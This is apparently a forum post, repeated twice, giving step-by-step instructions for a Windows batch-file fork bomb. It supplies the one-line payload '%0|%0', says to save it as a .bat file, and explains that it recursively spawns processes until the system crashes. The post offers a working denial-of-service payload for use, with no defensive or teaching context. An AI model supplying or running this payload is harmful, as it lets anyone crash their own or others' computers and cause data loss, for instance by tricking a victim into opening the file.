Steps to create a "Fork Bomb" in Five Letters.
First Step : Paste This Command In Notepad
Quote:
%0|%0
Last Step : and save this file as .bat
-------------------------------------
So..How Does It Work?
Quote:
%0
is the name of the currently executing batch file. A batch file that simply does:
Quote:
%0|%0
Is going to recursively execute itself forever, quickly creating many processes until it crashes the system down.
-------------------------------------
First Step : Paste This Command In Notepad
Quote:
%0|%0
Last Step : and save this file as .bat
-------------------------------------
So..How Does It Work?
Quote:
%0
is the name of the currently executing batch file. A batch file that simply does:
Quote:
%0|%0
Is going to recursively execute itself forever, quickly creating many processes until it crashes the system down.
-------------------------------------